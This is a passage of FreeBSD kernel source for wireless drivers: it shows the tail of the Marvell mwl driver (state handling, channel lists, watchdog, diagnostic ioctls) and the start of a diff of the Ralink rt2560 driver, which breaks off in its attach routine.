ifp->if_softc; struct mwl_hal *mh = sc->sc_mh; enum ieee80211_state ostate = vap->iv_state; int error; DPRINTF(sc, MWL_DEBUG_STATE, "%s: %s: %s -> %s\n", vap->iv_ifp->if_xname, __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); callout_stop(&sc->sc_timer); /* * Clear current radar detection state. */ if (ostate == IEEE80211_S_CAC) { /* stop quiet mode radar detection */ mwl_hal_setradardetection(mh, DR_CHK_CHANNEL_AVAILABLE_STOP); } else if (sc->sc_radarena) { /* stop in-service radar detection */ mwl_hal_setradardetection(mh, DR_DFS_DISABLE); sc->sc_radarena = 0; } /* * Carry out per-state actions before doing net80211 work. */ if (nstate == IEEE80211_S_INIT) { /* NB: only ap+sta vap's have a fw entity */ if (hvap != NULL) mwl_hal_stop(hvap); } else if (nstate == IEEE80211_S_SCAN) { mwl_hal_start(hvap); /* NB: this disables beacon frames */ mwl_hal_setinframode(hvap); } else if (nstate == IEEE80211_S_AUTH) { /* * Must create a sta db entry in case a WEP key needs to * be plumbed. This entry will be overwritten if we * associate; otherwise it will be reclaimed on node free. 
*/ ni = vap->iv_bss; MWL_NODE(ni)->mn_hvap = hvap; (void) mwl_peerstadb(ni, 0, 0, NULL); } else if (nstate == IEEE80211_S_CSA) { /* XXX move to below? */ if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_MBSS) mwl_startcsa(vap); } else if (nstate == IEEE80211_S_CAC) { /* XXX move to below? */ /* stop ap xmit and enable quiet mode radar detection */ mwl_hal_setradardetection(mh, DR_CHK_CHANNEL_AVAILABLE_START); } /* * Invoke the parent method to do net80211 work. */ error = mvp->mv_newstate(vap, nstate, arg); /* * Carry out work that must be done after net80211 runs; * this work requires up to date state (e.g. iv_bss). */ if (error == 0 && nstate == IEEE80211_S_RUN) { /* NB: collect bss node again, it may have changed */ ni = vap->iv_bss; DPRINTF(sc, MWL_DEBUG_STATE, "%s: %s(RUN): iv_flags 0x%08x bintvl %d bssid %s " "capinfo 0x%04x chan %d\n", vap->iv_ifp->if_xname, __func__, vap->iv_flags, ni->ni_intval, ether_sprintf(ni->ni_bssid), ni->ni_capinfo, ieee80211_chan2ieee(ic, ic->ic_curchan)); /* * Recreate local sta db entry to update WME/HT state. */ mwl_localstadb(vap); switch (vap->iv_opmode) { case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: if (ostate == IEEE80211_S_CAC) { /* enable in-service radar detection */ mwl_hal_setradardetection(mh, DR_IN_SERVICE_MONITOR_START); sc->sc_radarena = 1; } /* * Allocate and setup the beacon frame * (and related state). */ error = mwl_reset_vap(vap, IEEE80211_S_RUN); if (error != 0) { DPRINTF(sc, MWL_DEBUG_STATE, "%s: beacon setup failed, error %d\n", __func__, error); goto bad; } /* NB: must be after setting up beacon */ mwl_hal_start(hvap); break; case IEEE80211_M_STA: DPRINTF(sc, MWL_DEBUG_STATE, "%s: %s: aid 0x%x\n", vap->iv_ifp->if_xname, __func__, ni->ni_associd); /* * Set state now that we're associated. */ mwl_hal_setassocid(hvap, ni->ni_bssid, ni->ni_associd); mwl_setrates(vap); mwl_hal_setrtsthreshold(hvap, vap->iv_rtsthreshold); if ((vap->iv_flags & IEEE80211_F_DWDS) && sc->sc_ndwdsvaps++ == 0) mwl_hal_setdwds(mh, 1); break; case IEEE80211_M_WDS: DPRINTF(sc, MWL_DEBUG_STATE, "%s: %s: bssid %s\n", vap->iv_ifp->if_xname, __func__, ether_sprintf(ni->ni_bssid)); mwl_seteapolformat(vap); break; default: break; } /* * Set CS mode according to operating channel; * this mostly an optimization for 5GHz. * * NB: must follow mwl_hal_start which resets csmode */ if (IEEE80211_IS_CHAN_5GHZ(ic->ic_bsschan)) mwl_hal_setcsmode(mh, CSMODE_AGGRESSIVE); else mwl_hal_setcsmode(mh, CSMODE_AUTO_ENA); /* * Start timer to prod firmware. */ if (sc->sc_ageinterval != 0) callout_reset(&sc->sc_timer, sc->sc_ageinterval*hz, mwl_agestations, sc); } else if (nstate == IEEE80211_S_SLEEP) { /* XXX set chip in power save */ } else if ((vap->iv_flags & IEEE80211_F_DWDS) && --sc->sc_ndwdsvaps == 0) mwl_hal_setdwds(mh, 0); bad: return error; } /* * Manage station id's; these are separate from AID's * as AID's may have values out of the range of possible * station id's acceptable to the firmware. */ static int allocstaid(struct mwl_softc *sc, int aid) { int staid; if (!(0 < aid && aid < MWL_MAXSTAID) || isset(sc->sc_staid, aid)) { /* NB: don't use 0 */ for (staid = 1; staid < MWL_MAXSTAID; staid++) if (isclr(sc->sc_staid, staid)) break; } else staid = aid; setbit(sc->sc_staid, staid); return staid; } static void delstaid(struct mwl_softc *sc, int staid) { clrbit(sc->sc_staid, staid); } /* * Setup driver-specific state for a newly associated node. * Note that we're called also on a re-associate, the isnew * param tells us if this is the first time or not. 
*/ static void mwl_newassoc(struct ieee80211_node *ni, int isnew) { struct ieee80211vap *vap = ni->ni_vap; struct mwl_softc *sc = vap->iv_ic->ic_ifp->if_softc; struct mwl_node *mn = MWL_NODE(ni); MWL_HAL_PEERINFO pi; uint16_t aid; int error; aid = IEEE80211_AID(ni->ni_associd); if (isnew) { mn->mn_staid = allocstaid(sc, aid); mn->mn_hvap = MWL_VAP(vap)->mv_hvap; } else { mn = MWL_NODE(ni); /* XXX reset BA stream? */ } DPRINTF(sc, MWL_DEBUG_NODE, "%s: mac %s isnew %d aid %d staid %d\n", __func__, ether_sprintf(ni->ni_macaddr), isnew, aid, mn->mn_staid); error = mwl_peerstadb(ni, aid, mn->mn_staid, mkpeerinfo(&pi, ni)); if (error != 0) { DPRINTF(sc, MWL_DEBUG_NODE, "%s: error %d creating sta db entry\n", __func__, error); /* XXX how to deal with error? */ } } /* * Periodically poke the firmware to age out station state * (power save queues, pending tx aggregates). */ static void mwl_agestations(void *arg) { struct mwl_softc *sc = arg; mwl_hal_setkeepalive(sc->sc_mh); if (sc->sc_ageinterval != 0) /* NB: catch dynamic changes */ callout_schedule(&sc->sc_timer, sc->sc_ageinterval*hz); } static const struct mwl_hal_channel * findhalchannel(const MWL_HAL_CHANNELINFO *ci, int ieee) { int i; for (i = 0; i < ci->nchannels; i++) { const struct mwl_hal_channel *hc = &ci->channels[i]; if (hc->ieee == ieee) return hc; } return NULL; } static int mwl_setregdomain(struct ieee80211com *ic, struct ieee80211_regdomain *rd, int nchan, struct ieee80211_channel chans[]) { struct mwl_softc *sc = ic->ic_ifp->if_softc; struct mwl_hal *mh = sc->sc_mh; const MWL_HAL_CHANNELINFO *ci; int i; for (i = 0; i < nchan; i++) { struct ieee80211_channel *c = &chans[i]; const struct mwl_hal_channel *hc; if (IEEE80211_IS_CHAN_2GHZ(c)) { mwl_hal_getchannelinfo(mh, MWL_FREQ_BAND_2DOT4GHZ, IEEE80211_IS_CHAN_HT40(c) ? MWL_CH_40_MHz_WIDTH : MWL_CH_20_MHz_WIDTH, &ci); } else if (IEEE80211_IS_CHAN_5GHZ(c)) { mwl_hal_getchannelinfo(mh, MWL_FREQ_BAND_5GHZ, IEEE80211_IS_CHAN_HT40(c) ? MWL_CH_40_MHz_WIDTH : MWL_CH_20_MHz_WIDTH, &ci); } else { if_printf(ic->ic_ifp, "%s: channel %u freq %u/0x%x not 2.4/5GHz\n", __func__, c->ic_ieee, c->ic_freq, c->ic_flags); return EINVAL; } /* * Verify channel has cal data and cap tx power. */ hc = findhalchannel(ci, c->ic_ieee); if (hc != NULL) { if (c->ic_maxpower > 2*hc->maxTxPow) c->ic_maxpower = 2*hc->maxTxPow; goto next; } if (IEEE80211_IS_CHAN_HT40(c)) { /* * Look for the extension channel since the * hal table only has the primary channel. 
*/ hc = findhalchannel(ci, c->ic_extieee); if (hc != NULL) { if (c->ic_maxpower > 2*hc->maxTxPow) c->ic_maxpower = 2*hc->maxTxPow; goto next; } } if_printf(ic->ic_ifp, "%s: no cal data for channel %u ext %u freq %u/0x%x\n", __func__, c->ic_ieee, c->ic_extieee, c->ic_freq, c->ic_flags); return EINVAL; next: ; } return 0; } #define IEEE80211_CHAN_HTG (IEEE80211_CHAN_HT|IEEE80211_CHAN_G) #define IEEE80211_CHAN_HTA (IEEE80211_CHAN_HT|IEEE80211_CHAN_A) static void addchan(struct ieee80211_channel *c, int freq, int flags, int ieee, int txpow) { c->ic_freq = freq; c->ic_flags = flags; c->ic_ieee = ieee; c->ic_minpower = 0; c->ic_maxpower = 2*txpow; c->ic_maxregpower = txpow; } static const struct ieee80211_channel * findchannel(const struct ieee80211_channel chans[], int nchans, int freq, int flags) { const struct ieee80211_channel *c; int i; for (i = 0; i < nchans; i++) { c = &chans[i]; if (c->ic_freq == freq && c->ic_flags == flags) return c; } return NULL; } static void addht40channels(struct ieee80211_channel chans[], int maxchans, int *nchans, const MWL_HAL_CHANNELINFO *ci, int flags) { struct ieee80211_channel *c; const struct ieee80211_channel *extc; const struct mwl_hal_channel *hc; int i; c = &chans[*nchans]; flags &= ~IEEE80211_CHAN_HT; for (i = 0; i < ci->nchannels; i++) { /* * Each entry defines an HT40 channel pair; find the * extension channel above and the insert the pair. */ hc = &ci->channels[i]; extc = findchannel(chans, *nchans, hc->freq+20, flags | IEEE80211_CHAN_HT20); if (extc != NULL) { if (*nchans >= maxchans) break; addchan(c, hc->freq, flags | IEEE80211_CHAN_HT40U, hc->ieee, hc->maxTxPow); c->ic_extieee = extc->ic_ieee; c++, (*nchans)++; if (*nchans >= maxchans) break; addchan(c, extc->ic_freq, flags | IEEE80211_CHAN_HT40D, extc->ic_ieee, hc->maxTxPow); c->ic_extieee = hc->ieee; c++, (*nchans)++; } } } static void addchannels(struct ieee80211_channel chans[], int maxchans, int *nchans, const MWL_HAL_CHANNELINFO *ci, int flags) { struct ieee80211_channel *c; int i; c = &chans[*nchans]; for (i = 0; i < ci->nchannels; i++) { const struct mwl_hal_channel *hc; hc = &ci->channels[i]; if (*nchans >= maxchans) break; addchan(c, hc->freq, flags, hc->ieee, hc->maxTxPow); c++, (*nchans)++; if (flags == IEEE80211_CHAN_G || flags == IEEE80211_CHAN_HTG) { /* g channel have a separate b-only entry */ if (*nchans >= maxchans) break; c[0] = c[-1]; c[-1].ic_flags = IEEE80211_CHAN_B; c++, (*nchans)++; } if (flags == IEEE80211_CHAN_HTG) { /* HT g channel have a separate g-only entry */ if (*nchans >= maxchans) break; c[-1].ic_flags = IEEE80211_CHAN_G; c[0] = c[-1]; c[0].ic_flags &= ~IEEE80211_CHAN_HT; c[0].ic_flags |= IEEE80211_CHAN_HT20; /* HT20 */ c++, (*nchans)++; } if (flags == IEEE80211_CHAN_HTA) { /* HT a channel have a separate a-only entry */ if (*nchans >= maxchans) break; c[-1].ic_flags = IEEE80211_CHAN_A; c[0] = c[-1]; c[0].ic_flags &= ~IEEE80211_CHAN_HT; c[0].ic_flags |= IEEE80211_CHAN_HT20; /* HT20 */ c++, (*nchans)++; } } } static void getchannels(struct mwl_softc *sc, int maxchans, int *nchans, struct ieee80211_channel chans[]) { const MWL_HAL_CHANNELINFO *ci; /* * Use the channel info from the hal to craft the * channel list. Note that we pass back an unsorted * list; the caller is required to sort it for us * (if desired). 
*/ *nchans = 0; if (mwl_hal_getchannelinfo(sc->sc_mh, MWL_FREQ_BAND_2DOT4GHZ, MWL_CH_20_MHz_WIDTH, &ci) == 0) addchannels(chans, maxchans, nchans, ci, IEEE80211_CHAN_HTG); if (mwl_hal_getchannelinfo(sc->sc_mh, MWL_FREQ_BAND_5GHZ, MWL_CH_20_MHz_WIDTH, &ci) == 0) addchannels(chans, maxchans, nchans, ci, IEEE80211_CHAN_HTA); if (mwl_hal_getchannelinfo(sc->sc_mh, MWL_FREQ_BAND_2DOT4GHZ, MWL_CH_40_MHz_WIDTH, &ci) == 0) addht40channels(chans, maxchans, nchans, ci, IEEE80211_CHAN_HTG); if (mwl_hal_getchannelinfo(sc->sc_mh, MWL_FREQ_BAND_5GHZ, MWL_CH_40_MHz_WIDTH, &ci) == 0) addht40channels(chans, maxchans, nchans, ci, IEEE80211_CHAN_HTA); } static void mwl_getradiocaps(struct ieee80211com *ic, int maxchans, int *nchans, struct ieee80211_channel chans[]) { struct mwl_softc *sc = ic->ic_ifp->if_softc; getchannels(sc, maxchans, nchans, chans); } static int mwl_getchannels(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; /* * Use the channel info from the hal to craft the * channel list for net80211. Note that we pass up * an unsorted list; net80211 will sort it for us. */ memset(ic->ic_channels, 0, sizeof(ic->ic_channels)); ic->ic_nchans = 0; getchannels(sc, IEEE80211_CHAN_MAX, &ic->ic_nchans, ic->ic_channels); ic->ic_regdomain.regdomain = SKU_DEBUG; ic->ic_regdomain.country = CTRY_DEFAULT; ic->ic_regdomain.location = 'I'; ic->ic_regdomain.isocc[0] = ' '; /* XXX? */ ic->ic_regdomain.isocc[1] = ' '; return (ic->ic_nchans == 0 ? EIO : 0); } #undef IEEE80211_CHAN_HTA #undef IEEE80211_CHAN_HTG #ifdef MWL_DEBUG static void mwl_printrxbuf(const struct mwl_rxbuf *bf, u_int ix) { const struct mwl_rxdesc *ds = bf->bf_desc; uint32_t status = le32toh(ds->Status); printf("R[%2u] (DS.V:%p DS.P:%p) NEXT:%08x DATA:%08x RC:%02x%s\n" " STAT:%02x LEN:%04x RSSI:%02x CHAN:%02x RATE:%02x QOS:%04x HT:%04x\n", ix, ds, (const struct mwl_desc *)bf->bf_daddr, le32toh(ds->pPhysNext), le32toh(ds->pPhysBuffData), ds->RxControl, ds->RxControl != EAGLE_RXD_CTRL_DRIVER_OWN ? "" : (status & EAGLE_RXD_STATUS_OK) ? " *" : " !", ds->Status, le16toh(ds->PktLen), ds->RSSI, ds->Channel, ds->Rate, le16toh(ds->QosCtrl), le16toh(ds->HtSig2)); } static void mwl_printtxbuf(const struct mwl_txbuf *bf, u_int qnum, u_int ix) { const struct mwl_txdesc *ds = bf->bf_desc; uint32_t status = le32toh(ds->Status); printf("Q%u[%3u]", qnum, ix); printf(" (DS.V:%p DS.P:%p)\n", ds, (const struct mwl_txdesc *)bf->bf_daddr); printf(" NEXT:%08x DATA:%08x LEN:%04x STAT:%08x%s\n", le32toh(ds->pPhysNext), le32toh(ds->PktPtr), le16toh(ds->PktLen), status, status & EAGLE_TXD_STATUS_USED ? "" : (status & 3) != 0 ? 
" *" : " !"); printf(" RATE:%02x PRI:%x QOS:%04x SAP:%08x FORMAT:%04x\n", ds->DataRate, ds->TxPriority, le16toh(ds->QosCtrl), le32toh(ds->SapPktInfo), le16toh(ds->Format)); #if MWL_TXDESC > 1 printf(" MULTIFRAMES:%u LEN:%04x %04x %04x %04x %04x %04x\n" , le32toh(ds->multiframes) , le16toh(ds->PktLenArray[0]), le16toh(ds->PktLenArray[1]) , le16toh(ds->PktLenArray[2]), le16toh(ds->PktLenArray[3]) , le16toh(ds->PktLenArray[4]), le16toh(ds->PktLenArray[5]) ); printf(" DATA:%08x %08x %08x %08x %08x %08x\n" , le32toh(ds->PktPtrArray[0]), le32toh(ds->PktPtrArray[1]) , le32toh(ds->PktPtrArray[2]), le32toh(ds->PktPtrArray[3]) , le32toh(ds->PktPtrArray[4]), le32toh(ds->PktPtrArray[5]) ); #endif #if 0 { const uint8_t *cp = (const uint8_t *) ds; int i; for (i = 0; i < sizeof(struct mwl_txdesc); i++) { printf("%02x ", cp[i]); if (((i+1) % 16) == 0) printf("\n"); } printf("\n"); } #endif } #endif /* MWL_DEBUG */ #if 0 static void mwl_txq_dump(struct mwl_txq *txq) { struct mwl_txbuf *bf; int i = 0; MWL_TXQ_LOCK(txq); STAILQ_FOREACH(bf, &txq->active, bf_list) { struct mwl_txdesc *ds = bf->bf_desc; MWL_TXDESC_SYNC(txq, ds, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); #ifdef MWL_DEBUG mwl_printtxbuf(bf, txq->qnum, i); #endif i++; } MWL_TXQ_UNLOCK(txq); } #endif static void mwl_watchdog(void *arg) { struct mwl_softc *sc; struct ifnet *ifp; sc = arg; callout_reset(&sc->sc_watchdog, hz, mwl_watchdog, sc); if (sc->sc_tx_timer == 0 || --sc->sc_tx_timer > 0) return; ifp = sc->sc_ifp; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) && !sc->sc_invalid) { if (mwl_hal_setkeepalive(sc->sc_mh)) if_printf(ifp, "transmit timeout (firmware hung?)\n"); else if_printf(ifp, "transmit timeout\n"); #if 0 mwl_reset(ifp); mwl_txq_dump(&sc->sc_txq[0]);/*XXX*/ #endif ifp->if_oerrors++; sc->sc_stats.mst_watchdog++; } } #ifdef MWL_DIAGAPI /* * Diagnostic interface to the HAL. This is used by various * tools to do things like retrieve register contents for * debugging. The mechanism is intentionally opaque so that * it can change frequently w/o concern for compatiblity. */ static int mwl_ioctl_diag(struct mwl_softc *sc, struct mwl_diag *md) { struct mwl_hal *mh = sc->sc_mh; u_int id = md->md_id & MWL_DIAG_ID; void *indata = NULL; void *outdata = NULL; u_int32_t insize = md->md_in_size; u_int32_t outsize = md->md_out_size; int error = 0; if (md->md_id & MWL_DIAG_IN) { /* * Copy in data. */ indata = malloc(insize, M_TEMP, M_NOWAIT); if (indata == NULL) { error = ENOMEM; goto bad; } error = copyin(md->md_in_data, indata, insize); if (error) goto bad; } if (md->md_id & MWL_DIAG_DYN) { /* * Allocate a buffer for the results (otherwise the HAL * returns a pointer to a buffer where we can read the * results). Note that we depend on the HAL leaving this * pointer for us to use below in reclaiming the buffer; * may want to be more defensive. 
*/ outdata = malloc(outsize, M_TEMP, M_NOWAIT); if (outdata == NULL) { error = ENOMEM; goto bad; } } if (mwl_hal_getdiagstate(mh, id, indata, insize, &outdata, &outsize)) { if (outsize < md->md_out_size) md->md_out_size = outsize; if (outdata != NULL) error = copyout(outdata, md->md_out_data, md->md_out_size); } else { error = EINVAL; } bad: if ((md->md_id & MWL_DIAG_IN) && indata != NULL) free(indata, M_TEMP); if ((md->md_id & MWL_DIAG_DYN) && outdata != NULL) free(outdata, M_TEMP); return error; } static int mwl_ioctl_reset(struct mwl_softc *sc, struct mwl_diag *md) { struct mwl_hal *mh = sc->sc_mh; int error; MWL_LOCK_ASSERT(sc); if (md->md_id == 0 && mwl_hal_fwload(mh, NULL) != 0) { device_printf(sc->sc_dev, "unable to load firmware\n"); return EIO; } if (mwl_hal_gethwspecs(mh, &sc->sc_hwspecs) != 0) { device_printf(sc->sc_dev, "unable to fetch h/w specs\n"); return EIO; } error = mwl_setupdma(sc); if (error != 0) { /* NB: mwl_setupdma prints a msg */ return error; } /* * Reset tx/rx data structures; after reload we must * re-start the driver's notion of the next xmit/recv. */ mwl_draintxq(sc); /* clear pending frames */ mwl_resettxq(sc); /* rebuild tx q lists */ sc->sc_rxnext = NULL; /* force rx to start at the list head */ return 0; } #endif /* MWL_DIAGAPI */ static int mwl_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { #define IS_RUNNING(ifp) \ ((ifp->if_flags & IFF_UP) && (ifp->if_drv_flags & IFF_DRV_RUNNING)) struct mwl_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *)data; int error = 0, startall; switch (cmd) { case SIOCSIFFLAGS: MWL_LOCK(sc); startall = 0; if (IS_RUNNING(ifp)) { /* * To avoid rescanning another access point, * do not call mwl_init() here. Instead, * only reflect promisc mode settings. */ mwl_mode_init(sc); } else if (ifp->if_flags & IFF_UP) { /* * Beware of being called during attach/detach * to reset promiscuous mode. In that case we * will still be marked UP but not RUNNING. * However trying to re-init the interface * is the wrong thing to do as we've already * torn down much of our state. There's * probably a better way to deal with this. */ if (!sc->sc_invalid) { mwl_init_locked(sc); /* XXX lose error */ startall = 1; } } else mwl_stop_locked(ifp, 1); MWL_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGMVSTATS: mwl_hal_gethwstats(sc->sc_mh, &sc->sc_stats.hw_stats); /* NB: embed these numbers to get a consistent view */ sc->sc_stats.mst_tx_packets = ifp->if_opackets; sc->sc_stats.mst_rx_packets = ifp->if_ipackets; /* * NB: Drop the softc lock in case of a page fault; * we'll accept any potential inconsisentcy in the * statistics. The alternative is to copy the data * to a local structure. 
*/ return copyout(&sc->sc_stats, ifr->ifr_data, sizeof (sc->sc_stats)); #ifdef MWL_DIAGAPI case SIOCGMVDIAG: /* XXX check privs */ return mwl_ioctl_diag(sc, (struct mwl_diag *) ifr); case SIOCGMVRESET: /* XXX check privs */ MWL_LOCK(sc); error = mwl_ioctl_reset(sc,(struct mwl_diag *) ifr); MWL_UNLOCK(sc); break; #endif /* MWL_DIAGAPI */ case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; #undef IS_RUNNING } #ifdef MWL_DEBUG static int mwl_sysctl_debug(SYSCTL_HANDLER_ARGS) { struct mwl_softc *sc = arg1; int debug, error; debug = sc->sc_debug | (mwl_hal_getdebug(sc->sc_mh) << 24); error = sysctl_handle_int(oidp, &debug, 0, req); if (error || !req->newptr) return error; mwl_hal_setdebug(sc->sc_mh, debug >> 24); sc->sc_debug = debug & 0x00ffffff; return 0; } #endif /* MWL_DEBUG */ static void mwl_sysctlattach(struct mwl_softc *sc) { #ifdef MWL_DEBUG struct sysctl_ctx_list *ctx = device_get_sysctl_ctx(sc->sc_dev); struct sysctl_oid *tree = device_get_sysctl_tree(sc->sc_dev); sc->sc_debug = mwl_debug; SYSCTL_ADD_PROC(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "debug", CTLTYPE_INT | CTLFLAG_RW, sc, 0, mwl_sysctl_debug, "I", "control debugging printfs"); #endif } /* * Announce various information on device/driver attach. */ static void mwl_announce(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; if_printf(ifp, "Rev A%d hardware, v%d.%d.%d.%d firmware (regioncode %d)\n", sc->sc_hwspecs.hwVersion, (sc->sc_hwspecs.fwReleaseNumber>>24) & 0xff, (sc->sc_hwspecs.fwReleaseNumber>>16) & 0xff, (sc->sc_hwspecs.fwReleaseNumber>>8) & 0xff, (sc->sc_hwspecs.fwReleaseNumber>>0) & 0xff, sc->sc_hwspecs.regionCode); sc->sc_fwrelease = sc->sc_hwspecs.fwReleaseNumber; if (bootverbose) { int i; for (i = 0; i <= WME_AC_VO; i++) { struct mwl_txq *txq = sc->sc_ac2q[i]; if_printf(ifp, "Use hw queue %u for %s traffic\n", txq->qnum, ieee80211_wme_acnames[i]); } } if (bootverbose || mwl_rxdesc != MWL_RXDESC) if_printf(ifp, "using %u rx descriptors\n", mwl_rxdesc); if (bootverbose || mwl_rxbuf != MWL_RXBUF) if_printf(ifp, "using %u rx buffers\n", mwl_rxbuf); if (bootverbose || mwl_txbuf != MWL_TXBUF) if_printf(ifp, "using %u tx buffers\n", mwl_txbuf); if (bootverbose && mwl_hal_ismbsscapable(sc->sc_mh)) if_printf(ifp, "multi-bss support\n"); #ifdef MWL_TX_NODROP if (bootverbose) if_printf(ifp, "no tx drop\n"); #endif } diff --git a/sys/dev/ral/rt2560.c b/sys/dev/ral/rt2560.c index 846d1797e38d..475544d23d6d 100644 --- a/sys/dev/ral/rt2560.c +++ b/sys/dev/ral/rt2560.c @@ -1,2826 +1,2826 @@ /* $FreeBSD$ */ /*- * Copyright (c) 2005, 2006 * Damien Bergamini * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
*/ #include __FBSDID("$FreeBSD$"); /*- * Ralink Technology RT2560 chipset driver * http://www.ralinktech.com/ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define RT2560_RSSI(sc, rssi) \ ((rssi) > (RT2560_NOISE_FLOOR + (sc)->rssi_corr) ? \ ((rssi) - RT2560_NOISE_FLOOR - (sc)->rssi_corr) : 0) #define RAL_DEBUG #ifdef RAL_DEBUG #define DPRINTF(sc, fmt, ...) do { \ if (sc->sc_debug > 0) \ printf(fmt, __VA_ARGS__); \ } while (0) #define DPRINTFN(sc, n, fmt, ...) do { \ if (sc->sc_debug >= (n)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, fmt, ...) #define DPRINTFN(sc, n, fmt, ...) #endif static struct ieee80211vap *rt2560_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void rt2560_vap_delete(struct ieee80211vap *); static void rt2560_dma_map_addr(void *, bus_dma_segment_t *, int, int); static int rt2560_alloc_tx_ring(struct rt2560_softc *, struct rt2560_tx_ring *, int); static void rt2560_reset_tx_ring(struct rt2560_softc *, struct rt2560_tx_ring *); static void rt2560_free_tx_ring(struct rt2560_softc *, struct rt2560_tx_ring *); static int rt2560_alloc_rx_ring(struct rt2560_softc *, struct rt2560_rx_ring *, int); static void rt2560_reset_rx_ring(struct rt2560_softc *, struct rt2560_rx_ring *); static void rt2560_free_rx_ring(struct rt2560_softc *, struct rt2560_rx_ring *); static int rt2560_newstate(struct ieee80211vap *, enum ieee80211_state, int); static uint16_t rt2560_eeprom_read(struct rt2560_softc *, uint8_t); static void rt2560_encryption_intr(struct rt2560_softc *); static void rt2560_tx_intr(struct rt2560_softc *); static void rt2560_prio_intr(struct rt2560_softc *); static void rt2560_decryption_intr(struct rt2560_softc *); static void rt2560_rx_intr(struct rt2560_softc *); static void rt2560_beacon_update(struct ieee80211vap *, int item); static void rt2560_beacon_expire(struct rt2560_softc *); static void rt2560_wakeup_expire(struct rt2560_softc *); static void rt2560_scan_start(struct ieee80211com *); static void rt2560_scan_end(struct ieee80211com *); static void rt2560_set_channel(struct ieee80211com *); static void rt2560_setup_tx_desc(struct rt2560_softc *, struct rt2560_tx_desc *, uint32_t, int, int, int, bus_addr_t); static int rt2560_tx_bcn(struct rt2560_softc *, struct mbuf *, struct ieee80211_node *); static int rt2560_tx_mgt(struct rt2560_softc *, struct mbuf *, struct ieee80211_node *); static int rt2560_tx_data(struct rt2560_softc *, struct mbuf *, struct ieee80211_node *); static void rt2560_start_locked(struct ifnet *); static void rt2560_start(struct ifnet *); static void rt2560_watchdog(void *); static int rt2560_ioctl(struct ifnet *, u_long, caddr_t); static void rt2560_bbp_write(struct rt2560_softc *, uint8_t, uint8_t); static uint8_t rt2560_bbp_read(struct rt2560_softc *, uint8_t); static void rt2560_rf_write(struct rt2560_softc *, uint8_t, uint32_t); static void rt2560_set_chan(struct rt2560_softc *, struct ieee80211_channel *); #if 0 static void rt2560_disable_rf_tune(struct rt2560_softc *); #endif static void rt2560_enable_tsf_sync(struct rt2560_softc *); static void rt2560_enable_tsf(struct rt2560_softc *); static void rt2560_update_plcp(struct 
rt2560_softc *); static void rt2560_update_slot(struct ifnet *); static void rt2560_set_basicrates(struct rt2560_softc *, const struct ieee80211_rateset *); static void rt2560_update_led(struct rt2560_softc *, int, int); static void rt2560_set_bssid(struct rt2560_softc *, const uint8_t *); static void rt2560_set_macaddr(struct rt2560_softc *, uint8_t *); static void rt2560_get_macaddr(struct rt2560_softc *, uint8_t *); static void rt2560_update_promisc(struct ifnet *); static const char *rt2560_get_rf(int); static void rt2560_read_config(struct rt2560_softc *); static int rt2560_bbp_init(struct rt2560_softc *); static void rt2560_set_txantenna(struct rt2560_softc *, int); static void rt2560_set_rxantenna(struct rt2560_softc *, int); static void rt2560_init_locked(struct rt2560_softc *); static void rt2560_init(void *); static void rt2560_stop_locked(struct rt2560_softc *); static int rt2560_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static const struct { uint32_t reg; uint32_t val; } rt2560_def_mac[] = { RT2560_DEF_MAC }; static const struct { uint8_t reg; uint8_t val; } rt2560_def_bbp[] = { RT2560_DEF_BBP }; static const uint32_t rt2560_rf2522_r2[] = RT2560_RF2522_R2; static const uint32_t rt2560_rf2523_r2[] = RT2560_RF2523_R2; static const uint32_t rt2560_rf2524_r2[] = RT2560_RF2524_R2; static const uint32_t rt2560_rf2525_r2[] = RT2560_RF2525_R2; static const uint32_t rt2560_rf2525_hi_r2[] = RT2560_RF2525_HI_R2; static const uint32_t rt2560_rf2525e_r2[] = RT2560_RF2525E_R2; static const uint32_t rt2560_rf2526_r2[] = RT2560_RF2526_R2; static const uint32_t rt2560_rf2526_hi_r2[] = RT2560_RF2526_HI_R2; static const struct { uint8_t chan; uint32_t r1, r2, r4; } rt2560_rf5222[] = { RT2560_RF5222 }; int rt2560_attach(device_t dev, int id) { struct rt2560_softc *sc = device_get_softc(dev); struct ieee80211com *ic; struct ifnet *ifp; int error; uint8_t bands; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; mtx_init(&sc->sc_mtx, device_get_nameunit(dev), MTX_NETWORK_LOCK, MTX_DEF | MTX_RECURSE); 